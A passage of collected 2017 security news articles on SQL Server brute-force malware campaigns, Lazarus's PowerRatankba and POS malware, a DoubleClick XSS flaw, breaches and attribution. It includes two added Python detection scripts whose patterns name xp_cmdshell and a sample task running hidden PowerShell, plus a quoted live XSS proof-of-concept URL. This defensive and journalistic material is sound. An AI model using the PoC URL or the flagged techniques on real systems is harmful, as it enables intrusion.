The droppers employed by the group usually establish persistence by creating a backdoor user and opening the Remote Desktop port. Next, malware is downloaded from a short-lived FTP or HTTP server.

Later on, the attackers also stop or disable anti-virus and monitoring applications and attempt to cover their tracks by deleting any unnecessary registry, file, and folder entries. The downloaded malware attempts to evade detection by using a fake MFC user interface and abnormally sized binaries containing large quantities of junk data.
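A detection-side illustration of the attack flow above, added here and not part of the GuardiCore report: it scans SQL Server ERRORLOG lines for a burst of failed logins from one client, a success from that same client afterwards, and xp_cmdshell or OLE automation being switched on. The log lines are constructed samples in the real ERRORLOG layout, and the threshold and time window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One ERRORLOG login line, e.g.
# 2017-03-15 03:12:44.00 Logon  Login failed for user 'sa'. Reason: ... [CLIENT: 203.0.113.5]
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*?\[CLIENT: (?P<client>[^\]]+)\]"
)
# sp_configure changes are logged as "Configuration option 'X' changed from 0 to 1."
CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
# Options the attack flow above relies on; flipping them on deserves a look.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}


def analyze_errorlog(lines, threshold=10, window=timedelta(seconds=60)):
    """Return a list of alert dicts for brute forcing, success-after-brute-force
    and risky configuration changes found in ERRORLOG lines."""
    alerts = []
    recent_failures = defaultdict(deque)  # client -> timestamps of failed logins
    flagged = set()                       # clients already reported as brute forcing
    for line in lines:
        m = LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            client = m["client"]
            if m["result"] == "failed":
                q = recent_failures[client]
                q.append(ts)
                while q and ts - q[0] > window:   # keep only failures inside the window
                    q.popleft()
                if len(q) >= threshold and client not in flagged:
                    flagged.add(client)
                    alerts.append({"type": "bruteforce", "client": client,
                                   "user": m["user"], "failures": len(q)})
            elif client in flagged:
                # A password guess that finally worked: treat as compromise, not noise.
                alerts.append({"type": "success_after_bruteforce",
                               "client": client, "user": m["user"]})
            continue
        c = CONFIG_RE.search(line)
        if c and c["opt"] in RISKY_OPTIONS and c["old"] == "0" and c["new"] == "1":
            alerts.append({"type": "risky_config_enabled", "option": c["opt"]})
    return alerts


def _constructed_failures(n):
    """n constructed failed-login lines for 'sa' from one client, one second apart."""
    return [
        f"2017-03-15 03:12:{44 + i:02d}.00 Logon       Login failed for user 'sa'. "
        f"Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]"
        for i in range(n)
    ]


# Constructed sample log (not from any real incident): a burst of failures,
# a success from the same client, then xp_cmdshell being enabled.
SAMPLE_LINES = (
    ["2017-03-15 03:12:44.00 Logon       Error: 18456, Severity: 14, State: 8."]
    + _constructed_failures(12)
    + [
        "2017-03-15 03:13:09.30 Logon       Login succeeded for user 'sa'. "
        "Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]",
        "2017-03-15 03:15:01.00 spid52      Configuration option 'xp_cmdshell' "
        "changed from 0 to 1. Run the RECONFIGURE statement to install.",
        "2017-03-15 08:00:00.00 Logon       Login failed for user 'app_user'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]",
    ]
)

if __name__ == "__main__":
    for alert in analyze_errorlog(SAMPLE_LINES):
        print(alert)
```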

Hex and Hanako, the security researchers discovered, use the same MS SQL Server attack flow and download unique attack configuration files. They create an identical scheduled task to run the same unique binary and target the same antivirus products.

Hanako gets its name from the backdoor user added to targeted databases.

Written in C++, Hex (it uses name variations of Hex.exe) can log key strokes and capture the screen and microphone to extract information from the victim machines and can download and execute additional modules.

The malware masquerades as Kugou Player, a popular Chinese music streaming service. Along with comments in Chinese found in the code, targets’ location, and configuration files showing email addresses from popular Chinese providers, this suggests that the actor behind the campaign is of Chinese origin, the researchers say.

Taylor (named after an image of Taylor Swift used to hide the keylogger) has been observed in over 80,000 attack attempts since March. As part of the attack, a backdoor related to the 2016 Mirai botnet is also downloaded onto the compromised servers, the researchers say.

Although it uses the same domain names over time and does not change IP addresses often, Taylor uses a more cautious attack script, where the hackers send most of the queries encoded in hex. They also store references to the servers in HTML pages downloaded during the attack.

“The best way to minimize your exposure to campaigns targeting databases is to control the machines that have access to the database. Routinely review the list of machines that have access to your databases, keep this list to a minimum and pay special attention to machines that are accessible directly from the internet. Every connection attempt from an IP or domain that does not belong to this list should be blocked and investigated,” GuardiCore concludes.

“There isn’t a server out there that is connected to a LAN which isn’t vulnerable to malware. If the LAN is connected to the Internet, bad actors can get in. Since infection is inevitable, it is important to watch for the telltale signs of an infection. Behaviors such as abnormal traffic to another host can be an indicator and this could be in the form of excessive connections (E.g. DDoS), bytes, or other metric. Even light scanning behaviors can be detected. Leveraging flow data for network traffic analytics is one of the best resources for monitoring and malware incident response,” Michael Patterson, CEO of Plixer, told SecurityWeek in an emailed comment.


Lithuania Bans Kaspersky Software as 'Potential' Threat
22.12.2017 securityweek BigBrothers
Lithuania will ban Moscow-based cyber security firm Kaspersky Lab's products from computers managing key energy, finance and transport systems due to security concerns, authorities said Thursday.

The Russian firm's software was banned from US government networks earlier this year amid allegations that it helped Russian intelligence steal top secret information.

"The government... recognised that Kaspersky Lab software is a potential national security threat," the Baltic EU state's defence ministry said in a statement.

The government agencies responsible for "critical infrastructure" must replace the popular anti-virus software in "a short while", it added.

Lithuanian intelligence chief Darius Jauniskis recently said the cyberfirm "was sometimes acting as a toy in the hands of (Russian President Vladimir) Putin's administration".

Kaspersky has repeatedly denied having any inappropriate ties with the Kremlin and said that malware-infected Microsoft Office software and not its own was to blame for the hacking theft of American intelligence materials.

Kaspersky told Russian media on Thursday it was "disappointed" and assured customers they "do not have to worry because they have not been subjected to any violation from our company."

"The Kaspersky laboratory has never helped nor will it ever assist any state in the world to engage in cyber-espionage or to conduct cyber-attacks," the company said. "The Kaspersky laboratory has no political connection or affiliation with any government."

Lithuania, a NATO and EU member of 2.8 million people, has been one of the most vocal critics of Russia, notably after its 2014 annexation of the Crimea peninsula from Ukraine.


Google Warns DoubleClick Customers of XSS Flaws
22.12.2017 securityweek
Vulnerability
Google has warned DoubleClick customers that some of the files provided by third-party vendors through its advertising platform can introduce cross-site scripting (XSS) vulnerabilities.

The tech giant has shared a list of more than a dozen advertising firms whose files are vulnerable to XSS attacks. The company has advised website owners and administrators to check if the files are present on their server – they are typically hosted in the root domain – and remove them.

“We have disabled these vendors where possible for all DoubleClick for Publishers and DoubleClick Ad Exchange customers. However, any of the mentioned files hosted on your site may still pose a risk and should be taken down. We will notify you as we learn more,” Google said.

Google’s DoubleClick for Publishers (DFP) and DoubleClick Ad Exchange advertising services allow customers to display ads outside an iframe, the inline frame used for embedding content within an HTML page. In order to expand ads outside the iframe, Google and third-party ad firms provide what is called an “iframe buster kit,” which includes several HTML and JavaScript files that need to be hosted on the customer’s domain.

Some of these files contain XSS vulnerabilities that allow attackers to execute arbitrary JavaScript code in the context of a user’s browser by getting the victim to click on a specially crafted link.

The issue was brought to light earlier this week by a researcher who uses the online monikers “Zmx” and “Tr4L.” He is an employee of IDM, a company that specializes in solutions for managing, delivering and monetizing content. The firm uses the problematic iframe buster kit, which led to the discovery of the vulnerabilities.

A proof-of-concept (PoC) provided by Zmx shows how these XSS bugs can be triggered:

https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life

Zmx told SecurityWeek that he disclosed his findings via the Full Disclosure mailing list on Tuesday without notifying Google “because he is lazy.” It’s unclear if Google’s alert to customers comes in response to the researcher’s post or if it learned about the flaws from other sources. We have reached out to Google for clarifications and will update this article if the company responds.

Zmx also pointed out that there are several other problematic iframe buster kits for expandable ads that may not be provided by Google. The vulnerable kits identified by the researcher and not included in Google’s list come from Undertone, Interpolls and IgnitionOne (netmng.com).

UPDATE. Google has provided the following statement to SecurityWeek:

"We have disabled these vendors, removed these files, and added instructions in our help center to help publishers manage any additional steps to help ensure their users are secure."


North Korean Hackers Targeting Individuals: Report
22.12.2017 securityweek BigBrothers

North Korea Bitten by Bitcoin Bug
North Korean state-sponsored hacking group Lazarus has started targeting individuals and organizations directly, instead of focusing exclusively on spying on financial institutions, Proofpoint reports.

Active since at least 2009, the Lazarus Group is considered one of the most disruptive nation-state sponsored actors, accused of being involved in numerous high-profile attacks. Some of these include the 2014 Sony Pictures hack, last year’s theft of $81 million from the Bangladesh Bank, and this year’s WannaCry ransomware attack.

The group was recently observed to be increasingly focused on financially motivated attacks and was named as the most serious threat against banks earlier this year. More recently, the group also started showing high interest in the skyrocketing prices of cryptocurrencies.

The multistage attacks that Proofpoint has uncovered rely on cryptocurrency-related lures to spread sophisticated backdoors and reconnaissance malware. In some cases, the hackers deploy additional malware, including the Gh0st remote access Trojan (RAT), in an attempt to steal credentials for cryptocurrency wallets and exchanges.

What’s more, Proofpoint's security researchers discovered that the nation-state actor also started targeting a point-of-sale (PoS) related framework to steal credit card data. These PoS attacks can potentially incur high financial losses given their timing near the holiday shopping season.

In a new report (PDF), Proofpoint details a new toolset associated with the Lazarus Group. Dubbed PowerRatankba, the toolset has been targeting individuals, companies, and organizations with interests in cryptocurrency via spear-phishing and phishing campaigns.

The hackers were observed using a total of six different attack vectors to deliver PowerRatankba, including a new Windows executable downloader called PowerSpritz, a malicious Windows Shortcut (LNK) file, malicious Compiled HTML Help (CHM) files, JavaScript (JS) downloaders, two macro-based Microsoft Office documents, and backdoored popular cryptocurrency applications hosted on internationalized domain (IDN) infrastructure, thus appearing as legitimate.

The campaigns started on or around June 30, 2017 and included highly targeted spear-phishing attacks focused on at least one executive at a cryptocurrency organization. While a PowerRatankba.A variant was used in these attacks, the rest of the campaigns used PowerRatankba.B, Proofpoint says.

Attack vectors

The PowerSpritz downloader hides both its legitimate payload and malicious PowerShell command using the Spritz encryption algorithm. The downloader has been delivered via spear-phishing attacks using the TinyCC link shortener service to hide the malicious link.

Posing as Telegram or Skype updates, PowerSpritz would first launch a legitimate installer to trick the user into believing they downloaded a working application installer or update. In the background, however, a PowerShell command is executed to download the first stage of PowerRatankba.

A malicious LNK file was observed using a known AppLocker bypass to retrieve the payload from a TinyURL shortener link. The CHM files abuse a well-known technique to create a shortcut object capable of executing malicious code and to cause the object to be automatically clicked.

The JavaScript (JS) downloaders are hosted on supposedly attacker-controlled servers and have been designed to retrieve decoy PDF documents featuring themes such as cryptocurrency exchanges Coinbase and Bithumb, the Falcon Coin ICO, and a list of Bitcoin transactions.

The researchers also associated two VBScript macro-laden Microsoft Office documents with this activity, namely one Word document and one Excel spreadsheet. The former uses an Internal Revenue Service (IRS) theme, while the latter uses a Bithumb lure.

New first-stage implant

Recent attacks involved the use of phishing emails to direct users to fake webpages in an attempt to trick them into downloading or updating cryptocurrency applications. A backdoor in the PyInstaller executables, however, was meant to download PowerRatankba.

The implant, supposedly a successor of Ratankba, which was publicly detailed earlier this year, is a first stage reconnaissance tool used for the deployment of further stage implants. Using HTTP for command and control (C&C) communication, PowerRatankba first sends information about the machine, including computer name, IP address, OS boot time and installation date, language, info on ports 139/3389/445, a process list, and output from two WMIC commands (PowerRatankba.B only).

After initial contact with the C&C, PowerRatankba.A sends a request to receive commands from the server. This malware variant can download a payload and execute it via memory injection; download a payload, save it to disk, and then execute it; sleep and send a new request afterwards; or exit.

For persistence, PowerRatankba.A saves a JS file to the Startup folder. Depending on whether it runs under an admin account or not, PowerRatankba.B either downloads a PowerShell script, saves it to disk, and creates a scheduled task to execute it on system startup, or downloads a VBScript file and saves it to the Startup folder.
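The two persistence mechanisms described above (a script dropped into the Startup folder, or a scheduled task that runs PowerShell at startup) are cheap to check for on a Windows host. The following is an added defensive example, not Proofpoint's code or anything from the malware: it flags script files in a Startup folder and Task Scheduler XML definitions (the format produced by `schtasks /query /xml`) that launch PowerShell on a boot or logon trigger. The Startup folder contents and the two task definitions are constructed for the demo; on a real host you would point `find_startup_scripts` at `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` and feed exported task XML to `task_runs_powershell_at_boot`.

```python
"""Detect PowerRatankba-style persistence artifacts (added example, constructed data)."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Script extensions that a user's Startup folder should rarely contain.
SUSPICIOUS_EXT = {".js", ".jse", ".vbs", ".vbe", ".ps1", ".bat", ".cmd", ".hta", ".wsf"}

# Namespace used by Windows Task Scheduler XML exports.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def find_startup_scripts(startup_dir):
    """Return paths of script files found directly inside a Startup folder."""
    hits = []
    for name in sorted(os.listdir(startup_dir)):
        path = os.path.join(startup_dir, name)
        if os.path.isfile(path) and os.path.splitext(name)[1].lower() in SUSPICIOUS_EXT:
            hits.append(path)
    return hits


def task_runs_powershell_at_boot(task_xml):
    """True if a Task Scheduler definition starts PowerShell on a boot or logon trigger."""
    root = ET.fromstring(task_xml)
    triggers = root.find("t:Triggers", TASK_NS)
    if triggers is None:
        return False
    # Element tags carry the namespace prefix in braces, so match on the suffix.
    if not any(t.tag.endswith(("BootTrigger", "LogonTrigger")) for t in triggers):
        return False
    for exe in root.iterfind(".//t:Exec", TASK_NS):
        cmd = (exe.findtext("t:Command", default="", namespaces=TASK_NS) + " " +
               exe.findtext("t:Arguments", default="", namespaces=TASK_NS))
        if re.search(r"powershell|pwsh", cmd, re.IGNORECASE):
            return True
    return False


# Constructed task definition mimicking the behaviour described for PowerRatankba.B
# (XML declaration omitted so the string parses as-is; real exports are UTF-16).
SAMPLE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -W Hidden -File C:\\ProgramData\\update.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task: a vendor updater on a calendar trigger.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2017-12-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Program Files\\Vendor\\updater.exe</Command></Exec></Actions>
</Task>"""


def demo():
    """Build a constructed Startup folder in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("notes.txt", "desktop.ini", "update.js", "helper.vbs"):
            with open(os.path.join(d, name), "w") as f:
                f.write("// constructed sample file\n")
        scripts = [os.path.basename(p) for p in find_startup_scripts(d)]
    return scripts, task_runs_powershell_at_boot(SAMPLE_TASK), task_runs_powershell_at_boot(BENIGN_TASK)


if __name__ == "__main__":
    print(demo())
```

The Startup-folder check is deliberately extension-based rather than content-based: the implant variants described here drop plain JS or VBScript, so file type alone is a strong signal in a location that normally holds shortcuts. The task check pairs the trigger with the action, because a PowerShell task on a daily calendar trigger is common in legitimate software and would otherwise produce noise.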

PowerRatankba.B was observed delivering a custom variant of the Gh0st RAT to several devices, but only to victims with obvious interest in cryptocurrencies. An attack involving the RAT revealed immediate interest in taking full remote control of the infected device to interact with a password-protected Bitcoin wallet, among other applications.

POS malware

The North Korean state-sponsored hackers appear to be interested in other financially motivated actions as well, beyond stealing millions in cryptocurrency. Thus, Proofpoint has discovered what appears to be a Lazarus operation focused on targeting PoS terminals of businesses operating in South Korea.

Dubbed RatankbaPOS, this might be “the first publicly documented nation-state sponsored campaign to steal PoS data from a PoS-related framework,” the security researchers note.

Although it’s unclear how the new malware variant is distributed, Proofpoint believes that PowerRatankba is used to deploy later stage implants that would ultimately infect systems with RatankbaPOS. The file was found on a C&C in plaintext, suggesting that it wasn’t deployed using the reconnaissance tool.

Deployment is achieved through a process injection dropper that can also achieve persistence by creating a registry key. The malware first checks with the server for an update and then starts the process injection search.

RatankbaPOS would hook a KSNETADSL.dll module “which appears to be the handling of encrypted and decrypted credit card numbers for a KSNET-related POS framework system.” According to Proofpoint, however, the module (two of them, actually) isn’t the correct target for the malware.

The security researchers believe that the malware might be targeting an encrypted form of the track data, suggesting that the actor is focused on a SoftCamp POS-related software application, framework, or device. The researchers believe “with high confidence” that the attacks are primarily targeting devices in South Korea.

Attribution

“Attribution is a controversial topic and arguably one of the most difficult tasks threat intelligence analysts face. However, based on our research, we assess with a high level of confidence given the information available to us that the operations and activity discussed in this research are attributed to Lazarus Group and ultimately North Korea,” Proofpoint says.

The security firm notes that the use of a specific implementation of the Spritz encryption cipher to encrypt PowerSpritz’ legitimate installer payload and malicious PowerShell commands is one clear indicator that this hacking group is behind the attacks. Furthermore, obfuscation techniques used in these campaigns overlap with those attributed to the Lazarus Group before.

The fact that PowerRatankba and RatankbaPOS include similar or identical features previously observed in the original Ratankba implants is another indicator of correct attribution, the researchers say. To that, the researchers add the use of a common directory for storing implants and logs, seen across the group's toolset, as well as the initial POST request to the C&C to deliver system information.

The researchers also discovered instances of code overlap between the RatankbaPOS dropper and the spreader implant used in the attack on the Far Eastern International Bank (FEIB) in Taiwan in October. The implants use the same directory and set up persistence in almost precisely the same way.

Additionally, Proofpoint discovered that content found in a PowerRatankba JS downloader decoy PDF file was previously used in Lazarus campaigns focused on espionage rather than for financial gain.

According to the security researchers, the detailed campaigns and tools belong to a financially motivated arm of the state actor, which should be differentiated from the espionage and disruption teams. The group is following the money, stealing directly from individuals and organizations instead of targeting financial institutions for espionage, as “traditional” threat actors do.

“This group now appears to be targeting individuals rather than just organizations: individuals are softer targets, often lacking resources and knowledge to defend themselves and providing new avenues of monetization for a state-sponsored threat actor’s toolkit,” Proofpoint concludes.


Nissan Canada Informs 1.1 Million Customers of Data Breach
22.12.2017 securityweek Incident
Nissan Canada revealed on Thursday that the personal information of some customers may have been compromised as a result of a data breach discovered by the company on December 11.

The incident affects individuals who have financed their vehicles through Nissan Canada Finance (NCF) and INFINITI Financial Services Canada. The exact number of impacted customers has yet to be determined, but Nissan is notifying all 1.13 million current and past customers.

While the company believes not all customers are affected, it has decided to offer all of them free credit monitoring services through TransUnion for a period of 12 months. NCF is in the process of sending out emails and letters to individuals whose information may have been compromised.

The attacker could have stolen names, addresses, vehicle details, vehicle identification numbers (VINs), credit scores, loan amounts, and information on monthly payments. Nissan Canada says the incident does not appear to involve payment card information.

There is no indication that Nissan or Infiniti customers in Canada who did not obtain financing through NCF or customers outside of Canada are impacted.

The company is working with law enforcement and data security experts to investigate the incident and has not made any comments on who might be behind the attack. Canadian privacy regulators have also been informed of the breach.

This is not the first time Nissan has been targeted by hackers. Back in 2012, the company reported finding malware on its global information systems network. Last year, the company was forced to shut down its global websites due to a cyberattack apparently motivated by anger over Japan's controversial whale and dolphin hunts.


Schneider Electric Patches Flaws in Pelco Video Management System
22.12.2017 securityweek ICS
Schneider Electric recently developed a firmware update for its Pelco VideoXpert Enterprise product to address several vulnerabilities, including a high severity code execution flaw.

Pelco VideoXpert Enterprise is a video management system used in commercial facilities worldwide. Researcher Gjoko Krstic discovered that the product is affected by two directory traversal bugs and an improper access control issue that can allow arbitrary code execution.

The most serious of the flaws is CVE-2017-9966, which allows an attacker to replace certain files and execute malicious code with system privileges, Schneider Electric and ICS-CERT said in their advisories.

The directory traversal vulnerabilities are tracked as CVE-2017-9964 and CVE-2017-9965, and they have been classified as medium severity. The first security hole allows an attacker to bypass authentication or hijack sessions by “sniffing communications.”

The second directory traversal can be exploited by an unauthorized user to access web server files that could contain sensitive information.

These Pelco VideoXpert Enterprise vulnerabilities have been patched with the release of firmware version 2.1. All prior versions are affected.

This is the third round of Pelco product vulnerabilities covered in advisories published by ICS-CERT. The organization also released an advisory in June 2016 for a serious vulnerability in the Digital Sentry video management system, and in March 2015 for a high severity flaw in the DS-NVs software package.


Intelligence Committee Outlines UK's Offensive and Defensive Cyber Posture
22.12.2017 securityweek BigBrothers
The UK Intelligence and Security Committee, which has oversight of the UK intelligence community, published its 2016-2017 annual report (PDF) on Wednesday. With the rider that the report was written prior to April 2017, but delayed in publication, it provides insight into the UK perspective on global cyber threats. Its discussion includes commentary on nation state adversaries, the potential impact of the Trump administration on UKUSA, and the effect of Brexit on GCHQ operations.

The primary cyber threats are perceived to come from state actors, organized criminals and terrorist groups. State actors are the most advanced, with objectives including traditional espionage, commercial secrets and geopolitical instability. Organized crime occupies the next level of sophistication, becoming increasingly competent and targeted, and concentrating on financial gain. Terrorist groups have the intent to use cyber techniques, but are currently thought to lack the requisite capabilities (although this is likely to change).

There is additional threat from hacktivists and less competent criminals. Hacktivists are often politically motivated and primarily use DDoS for publicity or to inflict reputational damage. The entry level for less-skilled criminals is lowering, and financial gain is the main motivation.

The impact from cyber threats is primarily economic, although the report notes, "increasingly there is a risk of physical damage in the 'real world'." This is magnified by the growing use of insecure internet of things (IoT) devices within the critical infrastructure. "Manufacturers," says the report, "are likely to side-line cyber security considerations, given their potential impact on time to market and, therefore, profits." The Committee urges the government to work with industry internationally "to promote the use of modern and secure operating systems in all smart devices connected to the internet."

The report describes the UK's new (since November 2016) National Cyber Security Strategy. It revolves around 'Defend' (which is typical cyber security mitigation); 'Deter' (which includes the specific warning, "We have the means to take offensive action in cyberspace, should we choose to do so"); and 'Develop' (based on "an innovative, growing cyber security industry").

GCHQ is tasked with implementing this policy; and it is leading to a change in GCHQ's traditional posture -- it is coming out of the shadows and promises to be more proactive in UK commercial cyber defense.

"We're spending too much time shouting at users and telling them they're too stupid to do the right thing frankly, and that hasn't worked and we need to get away from that," GCHQ told the Committee. The new approach has been called 'active cyber defense', and "includes GCHQ assisting private companies in developing automated technological solutions to operate on the underlying internet infrastructure that would prevent a large proportion of cyber attacks from ever reaching end-users."

Part of this process can be seen in the National Cyber Security Centre (NCSC), which is partly GCHQ (still covert) and partly an advice center backed by the skills and knowledge of GCHQ. Its aim, says GCHQ, is "to fuse powerful covert capabilities, accesses, data and skills to help provide cyber defense at scale to the UK."

The Committee asked whether GCHQ should have legal cyber security enforcement powers. GCHQ welcomes the tendency for existing regulatory organizations (such as the Bank of England and the Office of the Nuclear Regulator) to consult with and take advice from the organization; but it is not a supporter of general 'cyber regulatory legislation'. While it is a political decision, it says it is hard to do, difficult to keep up with technology, and problematic across different industry sectors.

The UK has a well-established offensive cyber capability program. GCHQ's ultimate position on the use of offensive capabilities is clear: "International law applies to state acts in cyberspace in the same way as anywhere else." If international law allows a response to kinetic activity, it will allow a response to cyber activity. The Committee says that GCHQ's offensive capabilities are "an effective deterrent".

The problem remains 'attribution'. "Further work will be required to develop a better international consensus on the rules of engagement for offensive cyber. GCHQ told us that it supported this concept in principle, but held some concerns, for example about others' adherence to such agreements."

The report highlights four specific cyber adversary states: Russia, China, Iran and North Korea. Russia is the primary concern. "It is possible that Russia is ostentatiously flexing its muscles towards the West under a deliberately thin blanket of deniability, or these may simply be providing a useful public cover for the Russian agencies' practice runs," suggests the report.

The intelligence community is more forthright. "The [Russian] risk appetite is quite different and they are quite prepared to use the world as a range, [saying] 'we will give it a go and see what happens'," said Defense Intelligence. "They clearly are operating to risk thresholds which are nothing like those that the West operates," said MI5. Despite this increasing level of mistrust between Russia and the West, the Committee urges "that limited lines of communication should be maintained, although a delicate balance is needed."

China remains a serious cyber threat, attempting to steal data for economic purposes and to acquire classified government and military data. GCHQ notes that since the UK and the U.S. both signed cyber security accords with China (where all sides agreed not to engage in commercial cyber espionage), China is taking more care to disguise attribution.

Iran gets relatively little coverage in the report. "Iranian motivations against the UK are more obscure than those of Russia and China. GCHQ has suggested that Iran is primarily attempting a show of strength."

North Korea is different. Its 'recklessness and unpredictability' is difficult to defend against. "It is prepared to use its capabilities without any concern for attribution, and for ideological motives which are alien to other countries," warns the report.

In international cyber relations, the report unsurprisingly highlights the Five Eyes (the UK, USA, Canada, Australia and New Zealand) as "the closest international intelligence partnership in the world." Bearing in mind that much of the report was compiled either before or during the first few months of the Trump administration, it is interesting to see the extent of UK concern -- even to the extent that it could upset Five Eyes relationships.

"Any significant change in US policies relating to detainee treatment," states the Committee, "would pose very serious questions for the UK-USA intelligence relationship. The US agencies are well aware of the implications for cooperation with the UK and other allies, and the UK Agencies are monitoring the situation closely." In fairness, neither the Committee nor the intelligence community expected this to happen.

Brexit is also a concern for international intelligence relations. While Brexit cannot affect the Five Eyes (none of which, after Brexit, will be part of the European Union), it will nevertheless affect the UK. The Director General of MI5 told the Committee that there were two sides to the problem. National security falls outside of the Lisbon Treaty (the basis of the European Union), and the UK expects to continue working with European intelligence agencies.

What's driving this, he said, is that "Half of Europe is scared of terrorism and the other half is scared of Russia and both halves want us to help them... So that will not change with Brexit because Article 4.2 [of the Lisbon Treaty] had all of that outside scope anyway." But he added that other parts of cyber relations do fall within Lisbon scope, "in areas like data sharing, what happens with borders... what happens with law enforcement cooperation..." All of this is far from decided yet.

GCHQ is more relaxed. Its European partnerships are bilateral, and not connected with any European institutions; "So there is no reason why it would be affected by Brexit." GCHQ is, however, concerned about data sharing and trade with Europe. "The big companies will need to be able to share data in a way that is legally compliant on... both sides, the UK and the EU. That's a policy issue way beyond intelligence, actually, but it will have big implications for us, so getting that right is important."

Asked for a formal assessment of the effect of Brexit on their operations, both GCHQ and MI5 referred the Committee to the Cabinet Office, saying it was a political matter. The Cabinet Office then declined to respond; and the report registers the Committee's disapproval. "The decision to leave the EU clearly has direct and indirect implications for the work of the Agencies -- and these are well within this Committee's remit."

Much of the report is necessarily concerned with budgets (usually redacted), staffing and premises. However, wherever cyber security, both offensive and defensive, is discussed, the report provides a bullish picture of improving UK capabilities.


Industry Reactions to U.S. Blaming North Korea for WannaCry
22.12.2017 securityweek BigBrothers
The United States, Canada, Japan, Australia and New Zealand have all officially accused North Korea this week of being behind the WannaCry campaign. They join the United Kingdom, which blamed Pyongyang for the attack back in October.

While some security firms pointed the finger at North Korea shortly after the attack, Japan and the Five Eyes countries claim their intelligence agencies reached the same conclusion after conducting their own investigations and sharing data with each other.

North Korea has once again denied the accusations, claiming that Washington was demonising it.

Some industry professionals point to evidence showing that these governments’ assessment is accurate, while others highlight that attribution is a difficult task, and warn that the world is not ready for the next WannaCry.

And the feedback begins...

Benjamin Read, Manager, Cyber Espionage Analysis, FireEye:

“FireEye has found the WannaCry malware shares unique code with WHITEOUT malware that we have previously attributed to suspected North Korean actors. While we have not verified other experts’ observation of known DPRK tools being used to drop early versions of WannaCry, we have not observed other groups use the code present in both WannaCry and WHITEOUT and we do not believe it is available in open source. This indicates a connection between the two.

Our analysis has found this unique code shared across additional North Korean malware, including NESTEGG and MACTRUCK. Significantly, while this code is present in the MACTRUCK malware, it is not used. The shared code likely means that, at a minimum, WannaCry operators share software development resources with North Korean espionage operators.

In addition to the WannaCry activity, we believe that North Korean actors are using multiple vectors to engage in cyber-criminal activity, including, most prominently, the targeting of Bitcoin exchanges. FireEye assesses that North Korea will continue to pursue financially motivated cyber intrusion to supplement the government's income."

Tim Erlin, VP of Product Management and Strategy, Tripwire:

“Accurate attribution for cyber attacks is almost always a difficult task, and it’s doubly so when the evidence leading to the conclusion can’t be shared.

With global public trust in the US government at a low point, it’s not surprising that there’s skepticism. If we’re going to have national security organizations delivering these types of conclusions on attribution to the public, we need to find a way to develop trusted output. The mantra of ‘trust us’ doesn’t cut it here.

This conclusion about North Korea’s culpability isn’t new. The UK discussed the very same conclusion in October, with the very same caveats about sharing the actual evidence. You can’t arrest a nation-state, which inevitably prevents any real closure on an incident like WannaCry.”

Chris Doman, Threat Engineer, AlienVault:

“WannaCry was linked to a group known as Lazarus, which others have linked to North Korea. There were two data points linking WannaCry to Lazarus - a number of rare code overlaps between WannaCry and Lazarus malware, and Symantec saw an early version of WannaCry manually deployed by Lazarus on one of their clients. The US government may have additional information, but the evidence provided at the time by the private sector was pretty strong.

The evidence linking Lazarus to North Korea is similarly strong. There are a very small number of publicly assigned internet addresses assigned to North Korea, and they pop up in Lazarus attacks. The attacks have been dated back to at least 2007, and often contain other clues such as North Korean fonts.

Things take time to come out of the government - but the timing today may have to do with other events. Lazarus have been particularly active recently - I’m seeing numerous new malware samples from them daily. A lot of their current activity involves stealing bitcoin and credit card numbers.”

Dmitri Alperovitch, CTO and Co-founder, CrowdStrike:

“[The US Government’s announcement] of its official public attribution of the WannaCry attack to North Korea regime is another step in establishing the importance for regularly attributing significant attacks to nation-states and criminal groups. It also raises public awareness about North Korea’s growing offensive cyber capabilities. CrowdStrike has tracked DPRK’s cyber activities going back to the mid-2000s, which started with espionage, then half a decade later evolved into destructive attacks and in the last few years delved into cybercrime such as ransomware and bank heists. They are a very capable actor that is known to have developed 0-day exploits and their own unique malware code. As such, they pose a major threat to organizations globally, especially as tensions between the US and North Korea over the nuclear and missile programs continue to escalate.”

Joseph Carson, Chief Security Scientist, Thycotic:

"Cyber attribution is one of the most difficult tasks in cybersecurity today. Unless the devices are persistent, it is almost impossible to identify who was sitting behind the keyboard, let alone who was instructing that person to carry out the malicious activity, without any advanced cyber forensics tools. When attribution is pointing to a nation state, it is crucial that the attribution is communicated by the impacted government and not any private company or entity. Private companies should focus on getting back to a secure and operational state and assist with evidence that assists the government in accordance with any compliance requirements. In my experience, when cybercrime crosses international borders, it is difficult to claim attribution without cooperation of the country to where the evidence leads.

The challenge with calling out a group like Lazarus, which is widely believed to be associated with North Korea and several previous cyber-attacks, is that it is important to be clear that this is a group and motives can change depending on who is paying. I have found when researching hacking groups they can one day be working for one government under one alias and another using a different alias. This means that association in cyberspace means nothing. In my experience in digital forensics, I have always followed two rules when analyzing a cyber-crime: follow the motive or follow the money — either one will lead to the criminal.

